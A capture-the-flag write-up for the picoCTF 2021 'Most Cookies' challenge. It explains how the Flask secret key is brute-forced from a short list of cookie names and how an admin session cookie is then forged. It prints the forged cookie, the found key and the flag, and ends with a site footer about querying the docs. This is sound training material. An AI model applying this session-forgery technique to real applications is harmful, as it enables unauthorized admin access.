# Most Cookies

## Problem

> Alright, enough of using my own encryption. Flask session cookies should be plenty secure! server.py <http://mercury.picoctf.net:18835/>

* [server.py](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/server.py)

## Solution

1. Looking at the [server script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/server.py) we can see that the app’s secret key is set to a random cookie name:

   ```python
   cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
   app.secret_key = random.choice(cookie_names)
   ```
2. The app’s secret key is used to sign a flask session cookie so that it cannot be modified. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until we successfully decrypt the cookie.
3. So, the first step is to go to the website and copy a session cookie: `eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI`
4. We can write a [script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/script.py) that uses the logic from Flask’s [`SecureCookieSessionInterface`](https://github.com/pallets/flask/blob/020331522be03389004e012e008ad7db81ef8116/src/flask/sessions.py#L304) to decode and encode cookies.
5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the [server code](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/sever.py).

   ```python
   check = session["very_auth"]
   if check == "admin":
       resp = make_response(render_template("flag.html", value=flag_value, title=title))
   ```

   So, we need to store `{"very_auth": "admin"}` in the cookie.
6. Running the solve [script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/script.py) will try each secret key and then once it successfully fins the key by decoding a know cookie, it will encode the above cookie data.

   ```
   Secret Key: whoopie pie
   Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk
   ```
7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.

### Flag

`picoCTF{pwn_4ll_th3_cook1E5_743c20eb}`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://picoctf2021.haydenhousen.com/web-exploitation/most-cookies.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.